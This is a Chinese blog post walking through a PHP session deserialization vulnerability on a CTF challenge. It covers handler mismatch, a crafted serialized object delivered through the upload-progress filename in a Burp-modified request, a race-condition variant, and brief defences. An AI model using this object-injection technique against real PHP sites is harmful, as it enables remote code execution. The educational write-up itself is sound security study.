<!DOCTYPE html><html lang="zh-CN"><head><meta name="google-site-verification" content="DwDg4EuywHWNZUkTC7sG0WGv_UQekM4uRtOoaGuDJHc"><meta name="baidu-site-verification" content="hkLiBHH93D"><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width,user-scalable=no,initial-scale=1,minimum-scale=1,maximum-scale=1"><meta http-equiv="Cache-Control" content="no-transform"><meta http-equiv="Cache-Control" content="no-siteapp"><meta name="description" content="php session反序列化漏洞"><link rel="alternate" href="/atom.xml" title="峰焕亭"><link rel="shortcut icon" type="image/x-icon" href="/favicon_io/favicon.ico?v=1.1"><link rel="canonical" href="https://xiaopo.org/posts/af6e5ddd.html"><meta name="description" content="php session在服务端是需要存储的，存储介质一般是file，存储就会涉及到序列化&#x2F;反序列化，当序列化&#x2F;反序列化处理器混用的情况就有可能出现问题，特别是在存储时使用php_serialize处理器，读取时使用php处理器，就很有可能会有问题，实际场景并不多，今天作为一种漏洞类型学习一下，大部分都是学习网上的思路，自己实践遇到了一些坑点。"><meta property="og:type" content="article"><meta property="og:title" content="php session反序列化漏洞"><meta property="og:url" content="https://xiaopo.org/posts/af6e5ddd.html"><meta property="og:site_name" content="峰焕亭"><meta property="og:description" content="php session在服务端是需要存储的，存储介质一般是file，存储就会涉及到序列化&#x2F;反序列化，当序列化&#x2F;反序列化处理器混用的情况就有可能出现问题，特别是在存储时使用php_serialize处理器，读取时使用php处理器，就很有可能会有问题，实际场景并不多，今天作为一种漏洞类型学习一下，大部分都是学习网上的思路，自己实践遇到了一些坑点。"><meta property="og:locale" content="zh_CN"><meta property="og:image" content="https://i.loli.net/2020/07/10/8aEIF5zQwyqmYsU.png"><meta property="og:image" content="https://i.loli.net/2020/07/10/YEn89uHV1lLcOfx.png"><meta property="og:image" content="https://i.loli.net/2020/07/10/uqMmdC5hAKX9ELw.png"><meta property="og:image" content="https://i.loli.net/2020/07/10/c7MG9LpOYX3kmfz.png"><meta property="og:image" content="https://i.loli.net/2020/07/10/qi6WfLx28RQv3Ce.png"><meta property="article:published_time" content="2020-07-10T15:55:09.000Z"><meta property="article:modified_time" content="2020-08-05T13:53:31.553Z"><meta property="article:author" content="xiaopo"><meta property="article:tag" content="峰焕亭 xiaopo 小破 寒沙胜雪 grayguest"><meta name="twitter:card" content="summary"><meta name="twitter:image" content="https://i.loli.net/2020/07/10/8aEIF5zQwyqmYsU.png"><link rel="stylesheet" type="text/css" href="/css/style.css?v=1.1"><link href="https://fonts.googleapis.com/css?family=Open+Sans" rel="stylesheet"><script type="text/javascript">var themeConfig={fancybox:{enable:!1}}</script><link rel="stylesheet" href="/plugins/highlight/styles/vs2015.css"><script>var _hmt=_hmt||[];!function(){var e=document.createElement("script");e.src="https://hm.baidu.com/hm.js?b733e1eaeacbf8f87d3be047f28c3973";var t=document.getElementsByTagName("script")[0];t.parentNode.insertBefore(e,t)}()</script><title>php session反序列化漏洞 - 峰焕亭</title><meta name="generator" content="Hexo 4.2.1"><link rel="alternate" href="/atom.xml" title="峰焕亭" type="application/atom+xml">
</head><body><div id="page"><header id="masthead"><div class="site-header-inner"><h1 class="site-title"><a href="/." class="logo">峰焕亭</a></h1><nav id="nav-top"><ul id="menu-top" class="nav-top-items"><li class="menu-item"><a href="/archives">归档</a></li><li class="menu-item"><a href="/about">关于</a></li><li class="menu-item"><a href="/atom.xml">订阅</a></li></ul></nav></div></header><div id="content"><div id="primary"><article class="post"><header class="post-header"><h1 class="post-title">php session反序列化漏洞</h1><time class="post-time">2020-07-10</time></header><div class="toc-container"><ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#原理"><span class="toc-text">原理</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#php-session反序列化的定义"><span class="toc-text">php session反序列化的定义</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#产生的原理"><span class="toc-text">产生的原理</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#涉及的php-ini配置项"><span class="toc-text">涉及的php.ini配置项</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#复现"><span class="toc-text">复现</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#利用竞态条件来实现session信息的反序列化"><span class="toc-text">利用竞态条件来实现session信息的反序列化</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#防御"><span class="toc-text">防御</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#参考链接"><span class="toc-text">参考链接</span></a></li></ol></div><div class="post-content"><p>php session在服务端是需要存储的，存储介质一般是file，存储就会涉及到序列化/反序列化，当序列化/反序列化处理器混用的情况就有可能出现问题，特别是在存储时使用php_serialize处理器，读取时使用php处理器，就很有可能会有问题，实际场景并不多，今天作为一种漏洞类型学习一下，大部分都是学习网上的思路，自己实践遇到了一些坑点。</p><a id="more"></a><h2 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h2><h3 id="php-session反序列化的定义"><a href="#php-session反序列化的定义" class="headerlink" title="php session反序列化的定义"></a>php session反序列化的定义</h3><p>什么是php session反序列化，当php开启会话(session_start)的时候，php会从对应session文件中读取数据将其反序列化到$_SESSION，同样地，当会话关闭时，php会把$_SESSION里面的数据序列化存入session文件，php内置了多种处理器用于存取$_SESSION数据，常用的有以下三种不同的处理格式：<br>| 处理器 | 对应的存储格式 | 示例（序列化串） | 备注 |<br>| ————————- | ———————————————————— | —————— | —————————————————- |<br>| php | 键名 ＋ 竖线 ＋ 经过 serialize() 函数反序列处理的值 | a|i:2; | |<br>| php_binary | 键名的长度对应的 ASCII 字符 ＋ 键名 ＋ 经过 serialize() 函数反序列处理的值 | ^Aai:2; | ^A为一个字符，<br>通过hexdump -C查看其十六进制为01 |<br>| php_serialize(php&gt;=5.5.4) | 经过 serialize() 函数反序列处理的数组 | a:1:{s:1:”a”;i:2;} | |<br>示例结果为<code>$_SESSION[&#39;a&#39;] = 2</code>的序列化串，可使用如下代码测试得到，</p><pre><code class="php">&lt;?php
ini_set(&#39;session.serialize_handler&#39;, &#39;php_serialize&#39;);
session_start();
$_SESSION[&#39;a&#39;] = 2;
session_write_close();</code></pre><p>我使用oneinstack安装php之后显示的默认处理器是php不是php_serialize，应该是oneinstack对其进行了修改</p><h3 id="产生的原理"><a href="#产生的原理" class="headerlink" title="产生的原理"></a>产生的原理</h3><p>漏洞产生的原理就是在用session.serialize_handler = php_serialize存储的字符可以引入|, 再用session.serialize_handler = php格式取出session文件内容时，|会被当成键值对的分隔符，在特定的地方会造成反序列化漏洞，具体可参见漏洞复现部分。</p><h3 id="涉及的php-ini配置项"><a href="#涉及的php-ini配置项" class="headerlink" title="涉及的php.ini配置项"></a>涉及的php.ini配置项<img src="https://i.loli.net/2020/07/10/8aEIF5zQwyqmYsU.png" alt="/data/typora_assets/php session反序列化踩坑/image-20200708210328939.png"></h3><p>默认情况下session.upload_progress.cleanup的值为On，我们目前暂时手动修改为Off，以便保证在脚本开始运行时上传进度相关的session信息依然存在，在该选项为On的情况下可以利用竞态条件来实现session信息的反序列化，关于该配置项的解释，可参见php官方文档。</p><blockquote><p>Note that if you run that code and you print out the content of $_SESSSION[$key] you get an empty array due that session.upload_progress.cleanup is on by default and it cleans the progress information as soon as all POST data has been read.<br>Set it to Off or 0 to see the content of $_SESSION[$key].</p></blockquote><h2 id="复现"><a href="#复现" class="headerlink" title="复现"></a>复现</h2><p><a href="http://web.jarvisoj.com:32784/index.php" target="_blank" rel="noopener">http://web.jarvisoj.com:32784/index.php</a> ，复制该题的源码存入session_unserialize.php，它在开头使用了<code>ini_set(&#39;session.serialize_handler&#39;, &#39;php&#39;);</code>而php.ini中session.serialize_handler配置为php_serialize，故可能存在php session反序列化漏洞，而恰好有类OowoO存在eval危险函数，此危险函数同时又在类OowoO的__destruct()中，于是我们使用如下代码构造序列化串以显示文件所在目录</p><pre><code class="php">&lt;?php
class OowoO
{
    public $mdzz=&#39;print_r(dirname(__FILE__));&#39;;
}
$obj = new OowoO();
$a = serialize($obj);

var_dump($a);

输出结果：
&#39;O:5:&quot;OowoO&quot;:1:{s:4:&quot;mdzz&quot;;s:27:&quot;print_r(dirname(__FILE__));&quot;;}&#39;</code></pre><p>在输出结果前面加上|，然后想办法作为$_SESSION的某个键值使用php_serialize处理器序列化到session文件中，然后再从session文件中使用php处理器反序列化出来，那么漏洞就会产生。<br>反序列化的漏洞文件session_unserialize.php已经有了，下一步重点是我们要想办法把序列化串存到$_SESSION中，这时就要用到php.ini的配置项sesssion.upload_progress.enabled=On，默认为开启状态，查看php官方文档<a href="https://www.php.net/manual/en/session.upload-progress.php" target="_blank" rel="noopener">https://www.php.net/manual/en/session.upload-progress.php</a></p><blockquote><p>The upload progress will be available in the $_SESSION superglobal when an upload is in progress, and when POSTing a variable of the same name as the session.upload_progress.name INI setting is set to. When PHP detects such POST requests, it will populate an array in the $_SESSION, where the index is a concatenated value of the session.upload_progress.prefix and session.upload_progress.name INI options. The key is typically retrieved by reading these INI settings, i.e.</p></blockquote><p>也就是说当开启上传进度查看时，如果发送一个POST请求，POST请求中有个参数的名称是session.upload_progress.name的值（一般是PHP_SESSION_UPLOAD_PROGRESS），那么后端会在$_SESSION超全局数组里面记录上传进度用以返回给前端，具体$_SESSION超全局数组里面会存储什么，下面也有介绍，也可以自行写代码测试进行查看，</p><pre><code class="php+HTML">Example of the structure of the progress upload array.

&lt;form action=&quot;upload.php&quot; method=&quot;POST&quot; enctype=&quot;multipart/form-data&quot;&gt;
 &lt;input type=&quot;hidden&quot; name=&quot;&lt;?php echo ini_get(&quot;session.upload_progress.name&quot;); ?&gt;&quot; value=&quot;123&quot; /&gt;
 &lt;input type=&quot;file&quot; name=&quot;file1&quot; /&gt;
 &lt;input type=&quot;file&quot; name=&quot;file2&quot; /&gt;
 &lt;input type=&quot;submit&quot; /&gt;
&lt;/form&gt;

The data stored in the session will look like this:

&lt;?php
$_SESSION[&quot;upload_progress_123&quot;] = array(
 &quot;start_time&quot; =&gt; 1234567890,   // The request time
 &quot;content_length&quot; =&gt; 57343257, // POST content length
 &quot;bytes_processed&quot; =&gt; 453489,  // Amount of bytes received and processed
 &quot;done&quot; =&gt; false,              // true when the POST handler has finished, successfully or not
 &quot;files&quot; =&gt; array(
  0 =&gt; array(
   &quot;field_name&quot; =&gt; &quot;file1&quot;,       // Name of the &lt;input/&gt; field
   // The following 3 elements equals those in $_FILES
   &quot;name&quot; =&gt; &quot;foo.avi&quot;,
   &quot;tmp_name&quot; =&gt; &quot;/tmp/phpxxxxxx&quot;,
   &quot;error&quot; =&gt; 0,
   &quot;done&quot; =&gt; true,                // True when the POST handler has finished handling this file
   &quot;start_time&quot; =&gt; 1234567890,    // When this file has started to be processed
   &quot;bytes_processed&quot; =&gt; 57343250, // Number of bytes received and processed for this file
  ),
  // An other file, not finished uploading, in the same request
  1 =&gt; array(
   &quot;field_name&quot; =&gt; &quot;file2&quot;,
   &quot;name&quot; =&gt; &quot;bar.avi&quot;,
   &quot;tmp_name&quot; =&gt; NULL,
   &quot;error&quot; =&gt; 0,
   &quot;done&quot; =&gt; false,
   &quot;start_time&quot; =&gt; 1234567899,
   &quot;bytes_processed&quot; =&gt; 54554,
  ),
 )
);</code></pre><p>值得一提的是这种情况下，$_SESSION超全局数组里面会存储$_FILES超全局数组里面的一些信息，最为关键的是file name和file temp name，我们就借助file name来把序列化串写入到$_SESSION中，构造html请求表单</p><pre><code class="html">&lt;!DOCTYPE html&gt;
&lt;html lang=&quot;en&quot;&gt;
&lt;head&gt;
    &lt;meta charset=&quot;UTF-8&quot;&gt;
    &lt;title&gt;php session unserialize example&lt;/title&gt;
&lt;/head&gt;
&lt;body&gt;
&lt;form action=&quot;http://localhost/vuln/session_unserialize.php&quot; method=&quot;POST&quot; enctype=&quot;multipart/form-data&quot;&gt;
    &lt;input type=&quot;hidden&quot; name=&quot;PHP_SESSION_UPLOAD_PROGRESS&quot; value=&quot;123&quot; /&gt;
    &lt;input type=&quot;file&quot; name=&quot;file&quot; /&gt;
    &lt;input type=&quot;submit&quot; /&gt;
&lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;</code></pre><p>随意提交文件上传，burp拦截改包如下，</p><pre><code class="http">POST /vuln/session_unserialize.php HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------1314365402189625052536245878
Content-Length: 424
Referer: http://localhost/vuln/session_unserialize.html
Cookie: PHPSESSID=9nhpcsuogisgjnmfm5e3gqri43; XDEBUG_SESSION=PHPSTORM
Connection: close
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0

-----------------------------1314365402189625052536245878
Content-Disposition: form-data; name=&quot;PHP_SESSION_UPLOAD_PROGRESS&quot;

123
-----------------------------1314365402189625052536245878
Content-Disposition: form-data; name=&quot;file&quot;; filename=&quot;|O:5:\&quot;OowoO\&quot;:1:{s:4:\&quot;mdzz\&quot;;s:27:\&quot;print_r(dirname(__FILE__));\&quot;;}&quot;
Content-Type: application/octet-stream


-----------------------------1314365402189625052536245878--
</code></pre><p>因为HTTP包Cookie中带有XDEBUG_SESSION=PHPSTORM，故burp发包也会触发PHPSTORM调试机制，该包我们调试一下，<br><img src="https://i.loli.net/2020/07/10/YEn89uHV1lLcOfx.png" alt="/data/typora_assets/php session反序列化踩坑/image-20200708220406122.png"></p><p>此时session文件内容如下</p><pre><code class="shell"># xiaopo @ fht in ~/grayguest.github.io on git:writing x [22:02:34] 
$ sudo cat /tmp/sess_9nhpcsuogisgjnmfm5e3gqri43
a:2:{s:1:&quot;a&quot;;i:2;s:19:&quot;upload_progress_123&quot;;a:5:{s:10:&quot;start_time&quot;;i:1594216960;s:14:&quot;content_length&quot;;i:424;s:15:&quot;bytes_processed&quot;;i:424;s:4:&quot;done&quot;;b:1;s:5:&quot;files&quot;;a:1:{i:0;a:7:{s:10:&quot;field_name&quot;;s:4:&quot;file&quot;;s:4:&quot;name&quot;;s:63:&quot;|O:5:&quot;OowoO&quot;:1:{s:4:&quot;mdzz&quot;;s:27:&quot;print_r(dirname(__FILE__));&quot;;}&quot;;s:8:&quot;tmp_name&quot;;s:14:&quot;/tmp/php5ueiZ3&quot;;s:5:&quot;error&quot;;i:0;s:4:&quot;done&quot;;b:1;s:10:&quot;start_time&quot;;i:1594216960;s:15:&quot;bytes_processed&quot;;i:424;}}}}%   </code></pre><p>此时还未更改反序列化处理器，所以$_SESSION数组比较正常，有的人可能会问，session_start()还没开始，怎么数据已经反序列化到$_SESSION数组中了呢，这可能是因为session.auto_start = on，具体session.auto_start的解释可参见<a href="https://github.com/80vul/phpcodz/blob/master/research/pch-013.md，" target="_blank" rel="noopener">https://github.com/80vul/phpcodz/blob/master/research/pch-013.md，</a></p><blockquote><p>配置选项 session.auto_start＝On，会自动注册 Session 会话，因为该过程是发生在脚本代码执行前，所以在脚本中设定的包括序列化处理器在内的 session 相关配选项的设置是不起作用的，因此一些需要在脚本中设置序列化处理器配置的程序会在 session.auto_start＝On 时，销毁自动生成的 Session 会话，然后设置需要的序列化处理器，再调用 session_start() 函数注册会话</p></blockquote><p>但是我的php.ini中session.auto_start配置为off，那又会是其他什么原因呢，猜测可能和上传过程有关系，先不管它，往下单步，</p><p><img src="https://i.loli.net/2020/07/10/uqMmdC5hAKX9ELw.png" alt="/data/typora_assets/php session反序列化踩坑/image-20200708220516329.png"><br>此时已经更改反序列化处理器为php，故会使用php处理器进行反序列化后存入$_SESSION，于是危险类被触发，返回当前路径，待执行完毕，session文件内容如下，</p><pre><code class="shell"># xiaopo @ fht in ~/grayguest.github.io on git:writing x [22:02:53] 
$ sudo cat /tmp/sess_9nhpcsuogisgjnmfm5e3gqri43
a:1:{s:19:&quot;upload_progress_123&quot;;a:5:{s:10:&quot;start_time&quot;;i:1594217096;s:14:&quot;content_length&quot;;i:424;s:15:&quot;bytes_processed&quot;;i:424;s:4:&quot;done&quot;;b:1;s:5:&quot;files&quot;;a:1:{i:0;a:7:{s:10:&quot;field_name&quot;;s:4:&quot;file&quot;;s:4:&quot;name&quot;;s:63:&quot;|O:5:&quot;OowoO&quot;:1:{s:4:&quot;mdzz&quot;;s:27:&quot;print_r(dirname(__FILE__));&quot;;}%   </code></pre><h2 id="利用竞态条件来实现session信息的反序列化"><a href="#利用竞态条件来实现session信息的反序列化" class="headerlink" title="利用竞态条件来实现session信息的反序列化"></a>利用竞态条件来实现session信息的反序列化</h2><p><a href="https://xz.aliyun.com/t/6640#toc-10" target="_blank" rel="noopener">https://xz.aliyun.com/t/6640#toc-10</a> ，panda师傅的这篇文章最后的实例，关于“由于请求后，session会立刻被清空覆盖，因此需要不断发送请求，这里可以写脚本，也可以直接利用burp ，我偷个懒直接利用 burp ：”我理解session之所以会被清空是因为session.upload_progress.cleanup为On，按道理它在php文件运行前就已经被清空了，后来得知panda师傅是利用竞态条件来实现的，然后我尝试burp发包1000次也没能写入文件，刚开始不知道可能是什么原因，<br><img src="https://i.loli.net/2020/07/10/c7MG9LpOYX3kmfz.png" alt="/data/typora_assets/php session反序列化踩坑/image-20200710104920949.png"><br>后来把burp intruder线程调到50，成功反序列化，另外注意web权限要有写本地文件权限。<br><img src="https://i.loli.net/2020/07/10/qi6WfLx28RQv3Ce.png" alt="/data/typora_assets/php session反序列化踩坑/image-20200710151950385.png"></p><h2 id="防御"><a href="#防御" class="headerlink" title="防御"></a>防御</h2><ul><li>统一使用相同的处理器做序列化/反序列化，比如php_serialize。</li><li>当使用php处理器做反序列化时，必须保证不和php_serialize处理器混用。</li></ul><h2 id="参考链接"><a href="#参考链接" class="headerlink" title="参考链接"></a>参考链接</h2><ul><li><a href="https://xz.aliyun.com/t/3674" target="_blank" rel="noopener">https://xz.aliyun.com/t/3674</a></li><li><a href="https://xz.aliyun.com/t/6640" target="_blank" rel="noopener">https://xz.aliyun.com/t/6640</a></li><li><a href="https://github.com/80vul/phpcodz/blob/master/research/pch-013.md" target="_blank" rel="noopener">https://github.com/80vul/phpcodz/blob/master/research/pch-013.md</a></li><li><a href="https://mp.weixin.qq.com/s/n5ofmXbDxWgOCg4oNgPtsw" target="_blank" rel="noopener">https://mp.weixin.qq.com/s/n5ofmXbDxWgOCg4oNgPtsw</a></li><li><a href="https://www.php.net/manual/en/session.upload-progress.php" target="_blank" rel="noopener">https://www.php.net/manual/en/session.upload-progress.php</a></li></ul></div><footer class="post-footer"><ul class="post-copyright"><li class="post-copyright-author"><span>本文作者： </span>xiaopo</li><li class="post-copyright-link"><span>本文链接：</span> <a href="https://xiaopo.org//posts/af6e5ddd.html" title="php session反序列化漏洞">https://xiaopo.org/posts/af6e5ddd.html</a></li><li class="post-copyright-license"><span>版权声明： </span>本网站所有文章除特别声明外，均采用<a href="https://creativecommons.org/licenses/by-nc-nd/4.0/" rel="external nofollow" target="_blank">CC BY-NC-ND 4.0</a>许可协议，非商业转载请注明出处（原文作者，原文链接），商业转载请联系作者获得授权。</li></ul><nav class="post-nav"><a class="prev" href="/posts/eb21dee.html"><i class="iconfont icon-left"></i> <span class="prev-text nav-default">redis getshell实战</span> <span class="prev-text nav-mobile">上一篇</span> </a><a class="next" href="/posts/24581dd4.html"><span class="next-text nav-default">买房相关知识汇总</span> <span class="prev-text nav-mobile">下一篇</span> <i class="iconfont icon-right"></i></a></nav><div class="comments" id="comments"></div></footer></article></div></div><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/gitalk@1/dist/gitalk.css"><script src="https://cdn.jsdelivr.net/npm/gitalk@1.5.2/dist/gitalk.min.js"></script><div id="gitalk-container"></div><script>var gitalk=new Gitalk({clientID:"ca4ae20760cf27ad5c6c",clientSecret:"671788fb8d6aed08906b70340a8ba3088ec03f39",repo:"grayguest.github.io",owner:"grayguest",admin:"grayguest",id:location.pathname,distractionFreeMode:"false"});gitalk.render("gitalk-container")</script><footer id="colophon"><span class="copyright-year">&copy; 2020 <span class="footer-author">xiaopo.</span> <span class="power-by">Powered by <a class="hexo-link" href="https://hexo.io/" target="_blank" rel="noopener">Hexo</a> and <a class="theme-link" href="https://github.com/frostfan/hexo-theme-polarbear" target="_blank" rel="noopener">Polar Bear</a></span></span></footer><div class="back-to-top" id="back-to-top"><i class="iconfont icon-up"></i></div></div><script type="text/javascript" src="/lib/jquery/jquery-3.1.1.min.js"></script><script type="text/javascript" src="/js/src/theme.js?v=1.1"></script><script type="text/javascript" src="/js/src/bootstrap.js?v=1.1"></script><script src="/plugins/highlight/highlight.pack.js"></script><script>hljs.initHighlightingOnLoad()</script></body></html>